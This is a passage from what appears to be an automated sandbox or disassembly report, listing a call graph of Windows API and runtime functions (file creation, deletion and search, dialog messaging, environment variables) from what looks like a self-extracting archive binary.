23496->23493 23498 a0400a _swprintf 51 API calls 23497->23498 23499 a1c008 GetFileAttributesW 23498->23499 23499->23497 23501 a1c01d MoveFileW 23499->23501 23500->23493 23501->23493 23502 a1c035 MoveFileExW 23501->23502 23502->23493 23503->23492 23503->23493 23645 a0b4f7 52 API calls 2 library calls 23503->23645 23505 a1d0ff __EH_prolog 23504->23505 23649 a0fead 23505->23649 23507 a1d130 23653 a05c59 23507->23653 23509 a1d14e 23657 a07c68 23509->23657 23513 a1d1a1 23674 a07cfb 23513->23674 23515 a1b504 23515->23433 23517 a1cd38 23516->23517 24162 a19d1a 23517->24162 23520 a1cd45 GetWindow 23521 a1b5d1 23520->23521 23524 a1cd65 23520->23524 23521->23291 23521->23292 23522 a1cd72 GetClassNameW 24167 a117ac CompareStringW 23522->24167 23524->23521 23524->23522 23525 a1cd96 GetWindowLongW 23524->23525 23526 a1cdfa GetWindow 23524->23526 23525->23526 23527 a1cda6 SendMessageW 23525->23527 23526->23521 23526->23524 23527->23526 23528 a1cdbc GetObjectW 23527->23528 24168 a19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23528->24168 23530 a1cdd3 24169 a19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23530->24169 24170 a19f5d 8 API calls ___scrt_fastfail 23530->24170 23533 a1cde4 SendMessageW DeleteObject 23533->23526 23534->23302 23536 a1a2e8 23535->23536 23537 a1a30d 23535->23537 24173 a117ac CompareStringW 23536->24173 23539 a1a312 SHAutoComplete 23537->23539 23540 a1a31b 23537->23540 23539->23540 23543 a1a7c3 23540->23543 23541 a1a2fb 23541->23537 23542 a1a2ff FindWindowExW 23541->23542 23542->23537 23544 a1a7cd __EH_prolog 23543->23544 23545 a01380 82 API calls 23544->23545 23546 a1a7ef 23545->23546 24174 a01f4f 23546->24174 23549 a1a809 23551 a01631 84 API calls 23549->23551 23550 a1a818 23552 a01951 126 API calls 23550->23552 23553 a1a814 23551->23553 23554 a1a83a __vsnwprintf_l ___std_exception_copy 23552->23554 23553->23332 23553->23337 23554->23553 23555 a01631 84 API calls 23554->23555 23555->23553 23556->23315 24182 a1ac74 PeekMessageW 23557->24182 23560 a1cb88 23564 a1cb93 ShowWindow SendMessageW SendMessageW 23560->23564 23561 a1cbbc SendMessageW SendMessageW 23562 a1cc17 SendMessageW SendMessageW SendMessageW 23561->23562 23563 a1cbf8 23561->23563 23565 a1cc4a SendMessageW 23562->23565 23566 a1cc6d SendMessageW 23562->23566 23563->23562 23564->23561 23565->23566 23566->23335 23567->23392 23568->23416 23569->23421 23570->23425 23571->23431 23572->23439 23573->23370 23574->23389 23575->23366 23576->23356 23577->23447 23578->23444 23580 a0a214 23579->23580 23581 a0a238 23580->23581 23583 a0a22b CreateDirectoryW 23580->23583 23582 a0a180 4 API calls 23581->23582 23585 a0a23e 23582->23585 23583->23581 23584 a0a26b 23583->23584 23589 a0a27a 23584->23589 23592 a0a444 23584->23592 23586 a0a27e GetLastError 23585->23586 23587 a0b66c 2 API calls 23585->23587 23586->23589 23590 a0a254 23587->23590 23589->23454 23590->23586 23591 a0a258 CreateDirectoryW 23590->23591 23591->23584 23591->23586 23593 a1e360 23592->23593 23594 a0a451 SetFileAttributesW 23593->23594 23595 a0a494 23594->23595 23596 a0a467 23594->23596 23595->23589 23597 a0b66c 2 API calls 23596->23597 23598 a0a47b 23597->23598 23598->23595 23599 a0a47f SetFileAttributesW 23598->23599 23599->23595 23601 a09820 23600->23601 23602 a09824 23600->23602 23601->23468 23602->23601 23611 a0a12d 23602->23611 23606 a096dc 23605->23606 23607 a096fa 23605->23607 23606->23607 23609 a096e8 CloseHandle 23606->23609 23608 a09719 23607->23608 23619 a06e3e 74 API calls 23607->23619 23608->23468 23609->23607 23612 a1e360 23611->23612 23613 a0a13a DeleteFileW 23612->23613 23614 a0984c 23613->23614 23615 a0a14d 23613->23615 23614->23468 23616 a0b66c 2 API calls 23615->23616 23617 a0a161 23616->23617 23617->23614 23618 a0a165 DeleteFileW 23617->23618 23618->23614 23619->23608 23626 a0d28a 23620->23626 23623 a0de22 LoadStringW 23624 a0ddfc SetDlgItemTextW 23623->23624 23625 a0de39 LoadStringW 23623->23625 23624->23478 23625->23624 23631 a0d1c3 23626->23631 23628 a0d2a7 23629 a0d2bc 23628->23629 23639 a0d2c8 26 API calls 23628->23639 23629->23623 23629->23624 23632 a0d1de 23631->23632 23638 a0d1d7 _strncpy 23631->23638 23634 a0d202 23632->23634 23640 a11596 WideCharToMultiByte 23632->23640 23637 a0d233 23634->23637 23641 a0dd6b 50 API calls __vsnprintf 23634->23641 23642 a258d9 26 API calls 3 library calls 23637->23642 23638->23628 23639->23629 23640->23634 23641->23637 23642->23638 23643->23493 23644->23493 23645->23503 23646->23493 23647->23493 23648->23493 23650 a0feba 23649->23650 23678 a01789 23650->23678 23652 a0fed2 23652->23507 23654 a0fead 23653->23654 23655 a01789 76 API calls 23654->23655 23656 a0fed2 23655->23656 23656->23509 23658 a07c72 __EH_prolog 23657->23658 23695 a0c827 23658->23695 23660 a07c8d 23701 a1e24a 23660->23701 23662 a07cb7 23707 a1440b 23662->23707 23665 a07ddf 23666 a07de9 23665->23666 23671 a07e53 23666->23671 23739 a0a4c6 23666->23739 23668 a07f06 23668->23513 23669 a07ec4 23669->23668 23745 a06dc1 74 API calls 23669->23745 23671->23669 23673 a0a4c6 8 API calls 23671->23673 23717 a0837f 23671->23717 23673->23671 23675 a07d09 23674->23675 23677 a07d10 23674->23677 23676 a11acf 84 API calls 23675->23676 23676->23677 23679 a0179f 23678->23679 23690 a017fa __vsnwprintf_l 23678->23690 23680 a017c8 23679->23680 23691 a06e91 74 API calls __vswprintf_c_l 23679->23691 23681 a01827 23680->23681 23684 a017e7 ___std_exception_copy 23680->23684 23683 a235de 22 API calls 23681->23683 23686 a0182e 23683->23686 23684->23690 23693 a06efd 75 API calls 23684->23693 23685 a017be 23692 a06efd 75 API calls 23685->23692 23686->23690 23694 a06efd 75 API calls 23686->23694 23690->23652 23691->23685 23692->23680 23693->23690 23694->23690 23696 a0c831 __EH_prolog 23695->23696 23697 a1e24a new 8 API calls 23696->23697 23698 a0c874 23697->23698 23699 a1e24a new 8 API calls 23698->23699 23700 a0c898 23699->23700 23700->23660 23706 a1e24f ___std_exception_copy 23701->23706 23702 a1e27b 23702->23662 23706->23702 23713 a271ad 7 API calls 2 library calls 23706->23713 23714 a1ecce RaiseException Concurrency::cancel_current_task new 23706->23714 23715 a1ecb1 RaiseException Concurrency::cancel_current_task 23706->23715 23708 a14415 __EH_prolog 23707->23708 23709 a1e24a new 8 API calls 23708->23709 23710 a14431 23709->23710 23711 a07ce6 23710->23711 23716 a106ba 78 API calls 23710->23716 23711->23665 23713->23706 23716->23711 23718 a08389 __EH_prolog 23717->23718 23746 a01380 23718->23746 23720 a083a4 23754 a09ef7 23720->23754 23726 a083d3 23877 a01631 23726->23877 23727 a0846e 23773 a08517 23727->23773 23731 a084ce 23780 a01f00 23731->23780 23734 a083cf 23734->23726 23734->23727 23737 a0a4c6 8 API calls 23734->23737 23881 a0bac4 CompareStringW 23734->23881 23735 a084d9 23735->23726 23784 a03aac 23735->23784 23794 a0857b 23735->23794 23737->23734 23740 a0a4db 23739->23740 23741 a0a4df 23740->23741 24150 a0a5f4 23740->24150 23741->23666 23743 a0a4ef 23743->23741 23744 a0a4f4 FindClose 23743->23744 23744->23741 23745->23668 23747 a01385 __EH_prolog 23746->23747 23748 a0c827 8 API calls 23747->23748 23749 a013bd 23748->23749 23750 a1e24a new 8 API calls 23749->23750 23753 a01416 ___scrt_fastfail 23749->23753 23751 a01403 23750->23751 23751->23753 23882 a0b07d 23751->23882 23753->23720 23755 a09f0e 23754->23755 23756 a083ba 23755->23756 23898 a06f5d 76 API calls 23755->23898 23756->23726 23758 a019a6 23756->23758 23759 a019b0 __EH_prolog 23758->23759 23769 a01a00 23759->23769 23772 a019e5 23759->23772 23899 a0709d 23759->23899 23761 a01b50 23902 a06dc1 74 API calls 23761->23902 23763 a03aac 97 API calls 23767 a01bb3 23763->23767 23764 a01b60 23764->23763 23764->23772 23765 a01bff 23771 a01c32 23765->23771 23765->23772 23903 a06dc1 74 API calls 23765->23903 23767->23765 23768 a03aac 97 API calls 23767->23768 23768->23767 23769->23761 23769->23764 23769->23772 23770 a03aac 97 API calls 23770->23771 23771->23770 23771->23772 23772->23734 23774 a08524 23773->23774 23921 a10c26 GetSystemTime SystemTimeToFileTime 23774->23921 23776 a08488 23776->23731 23777 a11359 23776->23777 23923 a1d51a 23777->23923 23781 a01f05 __EH_prolog 23780->23781 23783 a01f39 23781->23783 23931 a01951 23781->23931 23783->23735 23785 a03ab8 23784->23785 23786 a03abc 23784->23786 23785->23735 23787 a03af7 23786->23787 23788 a03ae9 23786->23788 24089 a027e8 97 API calls 3 library calls 23787->24089 23789 a03b29 23788->23789 24088 a03281 85 API calls 3 library calls 23788->24088 23789->23735 23792 a03af5 23792->23789 24090 a0204e 74 API calls 23792->24090 23795 a08585 __EH_prolog 23794->23795 23796 a085be 23795->23796 23812 a085c2 23795->23812 24113 a184bd 99 API calls 23795->24113 23797 a085e7 23796->23797 23802 a0867a 23796->23802 23796->23812 23799 a08609 23797->23799 23797->23812 24114 a07b66 151 API calls 23797->24114 23799->23812 24115 a184bd 99 API calls 23799->24115 23802->23812 24091 a05e3a 23802->24091 23804 a08705 23804->23812 24097 a0826a 23804->24097 23807 a08875 23808 a0a4c6 8 API calls 23807->23808 23810 a088e0 23807->23810 23808->23810 23809 a0c991 80 API calls 23820 a0893b _memcmp 23809->23820 24101 a07d6c 23810->24101 23812->23735 23813 a08a70 23814 a08b43 23813->23814 23821 a08abf 23813->23821 23818 a08b9e 23814->23818 23831 a08b4e 23814->23831 23815 a08a69 24118 a01f94 74 API calls 23815->24118 23828 a08b30 23818->23828 24121 a080ea 96 API calls 23818->24121 23819 a08b9c 23824 a09653 79 API calls 23819->23824 23820->23809 23820->23812 23820->23813 23820->23815 24116 a08236 82 API calls 23820->24116 24117 a01f94 74 API calls 23820->24117 23825 a0a180 4 API calls 23821->23825 23821->23828 23823 a09653 79 API calls 23823->23812 23824->23812 23826 a08af7 23825->23826 23826->23828 24119 a09377 96 API calls 23826->24119 23827 a08c09 23840 a08c74 23827->23840 23875 a091c1 __except_handler4 23827->23875 24122 a09989 23827->24122 23828->23819 23828->23827 23829 a0aa88 8 API calls 23832 a08cc3 23829->23832 23831->23819 24120 a07f26 100 API calls __except_handler4 23831->24120 23836 a0aa88 8 API calls 23832->23836 23834 a08c4c 23834->23840 24126 a01f94 74 API calls 23834->24126 23853 a08cd9 23836->23853 23838 a08c62 24127 a07061 75 API calls 23838->24127 23840->23829 23841 a08df7 23844 a08e69 23841->23844 23845 a08e07 23841->23845 23842 a08efd 23847 a08f23 23842->23847 23848 a08f0f 23842->23848 23864 a08e27 23842->23864 23843 a08d9c 23843->23841 23843->23842 23846 a0826a CharUpperW 23844->23846 23849 a08e4d 23845->23849 23857 a08e15 23845->23857 23850 a08e84 23846->23850 23852 a12c42 75 API calls 23847->23852 23851 a092e6 121 API calls 23848->23851 23849->23864 24130 a07907 108 API calls 23849->24130 23860 a08eb4 23850->23860 23861 a08ead 23850->23861 23850->23864 23851->23864 23855 a08f3c 23852->23855 23853->23843 24128 a09b21 SetFilePointer GetLastError SetEndOfFile 23853->24128 23858 a128f1 121 API calls 23855->23858 24129 a01f94 74 API calls 23857->24129 23858->23864 24132 a09224 94 API calls __EH_prolog 23860->24132 24131 a07698 84 API calls __except_handler4 23861->24131 23866 a0904b 23864->23866 24133 a01f94 74 API calls 23864->24133 23868 a09104 23866->23868 23866->23875 23876 a09156 23866->23876 24107 a09ebf SetEndOfFile 23866->24107 23867 a0a444 4 API calls 23871 a091b1 23867->23871 24108 a09d62 23868->24108 23871->23875 24134 a01f94 74 API calls 23871->24134 23872 a0914b 23874 a096d0 75 API calls 23872->23874 23874->23876 23875->23823 23876->23867 23876->23875 23878 a01643 23877->23878 24149 a0c8ca 84 API calls 23878->24149 23881->23734 23883 a0b087 __EH_prolog 23882->23883 23888 a0ea80 80 API calls 23883->23888 23885 a0b099 23889 a0b195 23885->23889 23888->23885 23890 a0b1a7 ___scrt_fastfail 23889->23890 23893 a10948 23890->23893 23896 a10908 GetCurrentProcess GetProcessAffinityMask 23893->23896 23897 a0b10f 23896->23897 23897->23753 23898->23756 23904 a016d2 23899->23904 23901 a070b9 23901->23769 23902->23772 23903->23771 23905 a016e8 23904->23905 23916 a01740 __vsnwprintf_l 23904->23916 23906 a01711 23905->23906 23917 a06e91 74 API calls __vswprintf_c_l 23905->23917 23907 a01767 23906->23907 23913 a0172d ___std_exception_copy 23906->23913 23909 a235de 22 API calls 23907->23909 23911 a0176e 23909->23911 23910 a01707 23918 a06efd 75 API calls 23910->23918 23911->23916 23920 a06efd 75 API calls 23911->23920 23913->23916 23919 a06efd 75 API calls 23913->23919 23916->23901 23917->23910 23918->23906 23919->23916 23920->23916 23922 a10c56 __vswprintf_c_l 23921->23922 23922->23776 23924 a1d527 23923->23924 23925 a0ddd1 53 API calls 23924->23925 23926 a1d54a 23925->23926 23927 a0400a _swprintf 51 API calls 23926->23927 23928 a1d55c 23927->23928 23929 a1cb5a 16 API calls 23928->23929 23930 a11372 23929->23930 23930->23731 23932 a01961 23931->23932 23934 a0195d 23931->23934 23935 a01896 23932->23935 23934->23783 23936 a018a8 23935->23936 23937 a018e5 23935->23937 23938 a03aac 97 API calls 23936->23938 23943 a03f18 23937->23943 23939 a018c8 23938->23939 23939->23934 23947 a03f21 23943->23947 23944 a03aac 97 API calls 23944->23947 23945 a01906 23945->23939 23948 a01e00 23945->23948 23947->23944 23947->23945 23960 a1067c 23947->23960 23949 a01e0a __EH_prolog 23948->23949 23968 a03b3d 23949->23968 23951 a01e34 23952 a01ebb 23951->23952 23953 a016d2 76 API calls 23951->23953 23952->23939 23954 a01e4b 23953->23954 23996 a01849 76 API calls 23954->23996 23956 a01e63 23958 a01e6f 23956->23958 23997 a1137a MultiByteToWideChar 23956->23997 23998 a01849 76 API calls 23958->23998 23961 a10683 23960->23961 23962 a1069e 23961->23962 23966 a06e8c RaiseException Concurrency::cancel_current_task 23961->23966 23964 a106af SetThreadExecutionState 23962->23964 23967 a06e8c RaiseException Concurrency::cancel_current_task 23962->23967 23964->23947 23966->23962 23967->23964 23969 a03b47 __EH_prolog 23968->23969 23970 a03b79 23969->23970 23971 a03b5d 23969->23971 23972 a03dc2 23970->23972 23976 a03ba5 23970->23976 24027 a06dc1 74 API calls 23971->24027 24052 a06dc1 74 API calls 23972->24052 23975 a03b68 23975->23951 23976->23975 23999 a12c42 23976->23999 23978 a03c26 23979 a03cb1 23978->23979 23995 a03c1d 23978->23995 24030 a0c991 23978->24030 24012 a0aa88 23979->24012 23980 a03c22 23980->23978 24029 a02034 76 API calls 23980->24029 23982 a03c12 24028 a06dc1 74 API calls 23982->24028 23983 a03bf4 23983->23978 23983->23980 23983->23982 23988 a03cc4 23989 a03d48 23988->23989 23990 a03d3e 23988->23990 24036 a128f1 23989->24036 24016 a092e6 23990->24016 23993 a03d46 23993->23995 24045 a01f94 74 API calls 23993->24045 24046 a11acf 23995->24046 23996->23956 23997->23958 23998->23952 24000 a12c51 23999->24000 24002 a12c5b 23999->24002 24053 a06efd 75 API calls 24000->24053 24004 a12ca2 ___std_exception_copy 24002->24004 24006 a12c9d Concurrency::cancel_current_task 24002->24006 24010 a12cfd ___scrt_fastfail 24002->24010 24003 a12da9 Concurrency::cancel_current_task 24056 a2157a RaiseException 24003->24056 24004->24003 24005 a12cd9 24004->24005 24004->24010 24054 a12b7b 75 API calls 3 library calls 24005->24054 24055 a2157a RaiseException 24006->24055 24010->23983 24011 a12dc1 24013 a0aa95 24012->24013 24015 a0aa9f 24012->24015 24014 a1e24a new 8 API calls 24013->24014 24014->24015 24015->23988 24017 a092f0 __EH_prolog 24016->24017 24057 a07dc6 24017->24057 24020 a0709d 76 API calls 24021 a09302 24020->24021 24060 a0ca6c 24021->24060 24023 a09314 24024 a0935c 24023->24024 24026 a0ca6c 114 API calls 24023->24026 24069 a0cc51 97 API calls __vsnwprintf_l 24023->24069 24024->23993 24026->24023 24027->23975 24028->23995 24029->23978 24031 a0c9b2 24030->24031 24032 a0c9c4 24030->24032 24070 a06249 80 API calls 24031->24070 24071 a06249 80 API calls 24032->24071 24035 a0c9bc 24035->23979 24037 a128fa 24036->24037 24039 a12923 24036->24039 24038 a12917 24037->24038 24041 a12919 24037->24041 24042 a1290f 24037->24042 24038->23993 24039->24038 24086 a14edf 121 API calls 2 library calls 24039->24086 24085 a15bf7 114 API calls 24041->24085 24072 a16646 24042->24072 24045->23995 24047 a11ad9 24046->24047 24048 a11af2 24047->24048 24051 a11b06 24047->24051 24087 a1075b 84 API calls 24048->24087 24050 a11af9 24050->24051 24052->23975 24053->24002 24054->24010 24055->24003 24056->24011 24058 a0acf5 GetVersionExW 24057->24058 24059 a07dcb 24058->24059 24059->24020 24065 a0ca82 __vsnwprintf_l 24060->24065 24061 a0cbf7 24062 a0cc1f 24061->24062 24063 a0ca0b 6 API calls 24061->24063 24064 a1067c SetThreadExecutionState RaiseException 24062->24064 24063->24062 24067 a0cbee 24064->24067 24065->24061 24066 a184bd 99 API calls 24065->24066 24065->24067 24068 a0ab70 89 API calls 24065->24068 24066->24065 24067->24023 24068->24065 24069->24023 24070->24035 24071->24035 24073 a12e6d 75 API calls 24072->24073 24080 a16657 ___BuildCatchObject __vsnwprintf_l 24073->24080 24074 a0ca6c 114 API calls 24074->24080 24075 a16a29 24076 a14bb3 98 API calls 24075->24076 24077 a16a39 __vsnwprintf_l 24076->24077 24077->24038 24078 a10a41 79 API calls 24078->24080 24079 a137c1 114 API calls 24079->24080 24080->24074 24080->24075 24080->24078 24080->24079 24081 a107f1 86 API calls 24080->24081 24082 a16a7b 114 API calls 24080->24082 24083 a170bf 121 API calls 24080->24083 24084 a1321a 98 API calls 24080->24084 24081->24080 24082->24080 24083->24080 24084->24080 24085->24038 24086->24038 24087->24050 24088->23792 24089->23792 24090->23789 24092 a05e4a 24091->24092 24135 a05d67 24092->24135 24094 a05eb5 24094->23804 24095 a05e7d 24095->24094 24140 a0ad65 CharUpperW CompareStringW 24095->24140 24098 a08289 24097->24098 24146 a1179d CharUpperW 24098->24146 24100 a08333 24100->23807 24102 a07d7b 24101->24102 24103 a07dbb 24102->24103 24147 a07043 74 API calls 24102->24147 24103->23820 24105 a07db3 24148 a06dc1 74 API calls 24105->24148 24107->23868 24109 a09d73 24108->24109 24111 a09d82 24108->24111 24110 a09d79 FlushFileBuffers 24109->24110 24109->24111 24110->24111 24112 a09dfb SetFileTime 24111->24112 24112->23872 24113->23796 24114->23799 24115->23812 24116->23820 24117->23820 24118->23813 24119->23828 24120->23819 24121->23828 24123 a09992 GetFileType 24122->24123 24124 a0998f 24122->24124 24125 a099a0 24123->24125 24124->23834 24125->23834 24126->23838 24127->23840 24128->23843 24129->23864 24130->23864 24131->23864 24132->23864 24133->23866 24134->23875 24141 a05c64 24135->24141 24138 a05d88 24138->24095 24139 a05c64 2 API calls 24139->24138 24140->24095 24142 a05c6e 24141->24142 24144 a05d56 24142->24144 24145 a0ad65 CharUpperW CompareStringW 24142->24145 24144->24138 24144->24139 24145->24142 24146->24100 24147->24105 24148->24103 24151 a0a5fe 24150->24151 24152 a0a691 FindNextFileW 24151->24152 24153 a0a621 FindFirstFileW 24151->24153 24154 a0a6b0 24152->24154 24155 a0a69c GetLastError 24152->24155 24156 a0a638 24153->24156 24161 a0a675 24153->24161 24154->24161 24155->24154 24157 a0b66c 2 API calls 24156->24157 24158 a0a64d 24157->24158 24159 a0a651 FindFirstFileW 24158->24159 24160 a0a66a GetLastError 24158->24160 24159->24160 24159->24161 24160->24161 24161->23743 24171 a19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24162->24171 24164 a19d21 24165 a19d2d 24164->24165 24172 a19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24164->24172 24165->23520 24165->23521 24167->23524 24168->23530 24169->23530 24170->23533 24171->24164 24172->24165 24173->23541 24175 a09ef7 76 API calls 24174->24175 24176 a01f5b 24175->24176 24177 a01f78 24176->24177 24178 a019a6 97 API calls 24176->24178 24177->23549 24177->23550 24179 a01f68 24178->24179 24179->24177 24181 a06dc1 74 API calls 24179->24181 24181->24177 24183 a1acc8 GetDlgItem 24182->24183 24184 a1ac8f GetMessageW 24182->24184 24183->23560 24183->23561 24185 a1aca5 IsDialogMessageW 24184->24185 24186 a1acb4 TranslateMessage DispatchMessageW 24184->24186 24185->24183 24185->24186 24186->24183 24836 a1b8e0 93 API calls _swprintf 24837 a18ce0 6 API calls 24840 a316e0 CloseHandle 24886 a1ebf7 20 API calls 24204 a1e1f9 24205 a1e203 24204->24205 24206 a1df59 ___delayLoadHelper2@8 19 API calls 24205->24206 24207 a1e210 24206->24207 24843 a214f8 RaiseException 24845 a1eac0 27 API calls pre_c_initialization 24887 a197c0 10 API calls 24847 a29ec0 21 API calls 24888 a2b5c0 GetCommandLineA GetCommandLineW 24848 a1a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24889 a2ebc1 21 API calls __vswprintf_c_l 24849 a1acd0 100 API calls 24893 a119d0 26 API calls std::bad_exception::bad_exception 24222 a1ead2 24223 a1eade ___DestructExceptionObject 24222->24223 24248 a1e5c7 24223->24248 24225 a1eae5 24227 a1eb0e 24225->24227 24328 a1ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24225->24328 24235 a1eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24227->24235 24259 a2824d 24227->24259 24231 a1eb2d ___DestructExceptionObject 24232 a1ebad 24267 a1f020 24232->24267 24235->24232 24329 a27243 38 API calls 3 library calls 24235->24329 24243 a1ebd9 24245 a1ebe2 24243->24245 24330 a2764a 28 API calls _abort 24243->24330 24331 a1e73e 13 API calls 2 library calls 24245->24331 24249 a1e5d0 24248->24249 24332 a1ed5b IsProcessorFeaturePresent 24249->24332 24251 a1e5dc 24333 a22016 24251->24333 24253 a1e5e1 24258 a1e5e5 24253->24258 24342 a280d7 24253->24342 24256 a1e5fc 24256->24225 24258->24225 24260 a28264 24259->24260 24261 a1ec4a ___delayLoadHelper2@8 5 API calls 24260->24261 24262 a1eb27 24261->24262 24262->24231 24263 a281f1 24262->24263 24264 a28220 24263->24264 24265 a1ec4a ___delayLoadHelper2@8 5 API calls 24264->24265 24266 a28249 24265->24266 24266->24235 24392 a1f350 24267->24392 24269 a1f033 GetStartupInfoW 24270 a1ebb3 24269->24270 24271 a2819e 24270->24271 24394 a2b290 24271->24394 24273 a1ebbc 24276 a1d5d4 24273->24276 24275 a281a7 24275->24273 24398 a2b59a 38 API calls 24275->24398 24519 a100cf 24276->24519 24280 a1d5f3 24568 a1a335 24280->24568 24282 a1d5fc 24572 a113b3 GetCPInfo 24282->24572 24284 a1d606 ___scrt_fastfail 24285 a1d619 GetCommandLineW 24284->24285 24286 a1d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24285->24286 24287 a1d628 24285->24287 24288 a0400a _swprintf 51 API calls 24286->24288 24605 a1bc84 81 API calls 24287->24605 24290 a1d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24288->24290 24575 a1aded LoadBitmapW 24290->24575 24291 a1d62e 24293 a1d6a0 24291->24293 24294 a1d636 OpenFileMappingW 24291->24294 24607 a1d287 SetEnvironmentVariableW SetEnvironmentVariableW 24293->24607 24296 a1d696 CloseHandle 24294->24296 24297 a1d64f MapViewOfFile 24294->24297 24296->24286 24300 a1d660 __vsnwprintf_l 24297->24300 24301 a1d68d UnmapViewOfFile 24297->24301 24606 a1d287 SetEnvironmentVariableW SetEnvironmentVariableW 24300->24606 24301->24296 24306 a18835 8 API calls 24308 a1d76a DialogBoxParamW 24306->24308 24307 a1d67c 24307->24301 24309 a1d7a4 24308->24309 24310 a1d7b6 Sleep 24309->24310 24311 a1d7bd 24309->24311 24310->24311 24314 a1d7cb 24311->24314 24608 a1a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24311->24608 24313 a1d7ea DeleteObject 24315 a1d806 24313->24315 24316 a1d7ff DeleteObject 24313->24316 24314->24313 24317 a1d837 24315->24317 24318 a1d849 24315->24318 24316->24315 24609 a1d2e6 6 API calls 24317->24609 24602 a1a39d 24318->24602 24320 a1d83d CloseHandle 24320->24318 24322 a1d883 24323 a2757e GetModuleHandleW 24322->24323 24324 a1ebcf 24323->24324 24324->24243 24325 a276a7 24324->24325 24744 a27424 24325->24744 24328->24225 24329->24232 24330->24245 24331->24231 24332->24251 24334 a2201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24333->24334 24346 a2310e 24334->24346 24338 a22031 24339 a2203c 24338->24339 24360 a2314a DeleteCriticalSection 24338->24360 24339->24253 24341 a22029 24341->24253 24388 a2b73a 24342->24388 24345 a2203f 8 API calls 3 library calls 24345->24258 24348 a23117 24346->24348 24349 a23140 24348->24349 24350 a22025 24348->24350 24361 a23385 24348->24361 24366 a2314a DeleteCriticalSection 24349->24366 24350->24341 24352 a2215c 24350->24352 24381 a2329a 24352->24381 24354 a22166 24359 a22171 24354->24359 24386 a23348 6 API calls try_get_function 24354->24386 24356 a2217f 24357 a2218c 24356->24357 24387 a2218f 6 API calls ___vcrt_FlsFree 24356->24387 24357->24338 24359->24338 24360->24341 24367 a23179 24361->24367 24364 a233bc InitializeCriticalSectionAndSpinCount 24365 a233a8 24364->24365 24365->24348 24366->24350 24368 a231ad 24367->24368 24369 a231a9 24367->24369 24368->24364 24368->24365 24369->24368 24373 a231cd 24369->24373 24374 a23219 24369->24374 24371 a231d9 GetProcAddress 24372 a231e9 __crt_fast_encode_pointer 24371->24372 24372->24368 24373->24368 24373->24371 24375 a23241 LoadLibraryExW 24374->24375 24380 a23236 24374->24380 24376 a2325d GetLastError 24375->24376 24379 a23275 24375->24379 24377 a23268 LoadLibraryExW 24376->24377 24376->24379 24377->24379 24378 a2328c FreeLibrary 24378->24380 24379->24378 24379->24380 24380->24369 24382 a23179 try_get_function 5 API calls 24381->24382 24383 a232b4 24382->24383 24384 a232cc TlsAlloc 24383->24384 24385 a232bd 24383->24385 24385->24354 24386->24356 24387->24359 24391 a2b753 24388->24391 24389 a1ec4a ___delayLoadHelper2@8 5 API calls 24390 a1e5ee 24389->24390 24390->24256 24390->24345 24391->24389 24393 a1f367 24392->24393 24393->24269 24393->24393 24395 a2b2a2 24394->24395 24396 a2b299 24394->24396 24395->24275 24399 a2b188 24396->24399 24398->24275 24400 a28fa5 pre_c_initialization 38 API calls 24399->24400 24401 a2b195 24400->24401 24419 a2b2ae 24401->24419 24403 a2b19d 24428 a2af1b 24403->24428 24406 a2b1b4 24406->24395 24407 a28518 __vswprintf_c_l 21 API calls 24408 a2b1c5 24407->24408 24415 a2b1f7 24408->24415 24435 a2b350 24408->24435 24411 a284de _free 20 API calls 24411->24406 24412 a2b1f2 24445 a2895a 20 API calls __dosmaperr 24412->24445 24413 a2b20f 24416 a2b23b 24413->24416 24417 a284de _free 20 API calls 24413->24417 24415->24411 24416->24415 24446 a2adf1 26 API calls 24416->24446 24417->24416 24420 a2b2ba ___DestructExceptionObject 24419->24420 24421 a28fa5 pre_c_initialization 38 API calls 24420->24421 24422 a2b2c4 24421->24422 24426 a2b348 ___DestructExceptionObject 24422->24426 24427 a284de _free 20 API calls 24422->24427 24447 a28566 38 API calls _abort 24422->24447 24448 a2a3f1 EnterCriticalSection 24422->24448 24449 a2b33f LeaveCriticalSection _abort 24422->24449 24426->24403 24427->24422 24429 a23dd6 __fassign 38 API calls 24428->24429 24430 a2af2d 24429->24430 24431 a2af4e 24430->24431 24432 a2af3c GetOEMCP 24430->24432 24433 a2af65 24431->24433 24434 a2af53 GetACP 24431->24434 24432->24433 24433->24406 24433->24407 24434->24433 24436 a2af1b 40 API calls 24435->24436 24437 a2b36f 24436->24437 24439 a2b3c0 IsValidCodePage 24437->24439 24442 a2b376 24437->24442 24444 a2b3e5 ___scrt_fastfail 24437->24444 24438 a1ec4a ___delayLoadHelper2@8 5 API calls 24440 a2b1ea 24438->24440 24441 a2b3d2 GetCPInfo 24439->24441 24439->24442 24440->24412 24440->24413 24441->24442 24441->24444 24442->24438 24450 a2aff4 GetCPInfo 24444->24450 24445->24415 24446->24415 24448->24422 24449->24422 24451 a2b0d8 24450->24451 24455 a2b02e 24450->24455 24454 a1ec4a ___delayLoadHelper2@8 5 API calls 24451->24454 24457 a2b184 24454->24457 24460 a2c099 24455->24460 24457->24442 24459 a2a275 __vswprintf_c_l 43 API calls 24459->24451 24461 a23dd6 __fassign 38 API calls 24460->24461 24462 a2c0b9 MultiByteToWideChar 24461->24462 24464 a2c18f 24462->24464 24465 a2c0f7 24462->24465 24466 a1ec4a ___delayLoadHelper2@8 5 API calls 24464->24466 24467 a28518 __vswprintf_c_l 21 API calls 24465->24467 24471 a2c118 __vsnwprintf_l ___scrt_fastfail 24465->24471 24468 a2b08f 24466->24468 24467->24471 24474 a2a275 24468->24474 24469 a2c189 24479 a2a2c0 20 API calls _free 24469->24479 24471->24469 24472 a2c15d MultiByteToWideChar 24471->24472 24472->24469 24473 a2c179 GetStringTypeW 24472->24473 24473->24469 24475 a23dd6 __fassign 38 API calls 24474->24475 24476 a2a288 24475->24476 24480 a2a058 24476->24480 24479->24464 24482 a2a073 __vswprintf_c_l 24480->24482 24481 a2a099 MultiByteToWideChar 24483 a2a0c3 24481->24483 24484 a2a24d 24481->24484 24482->24481 24489 a28518 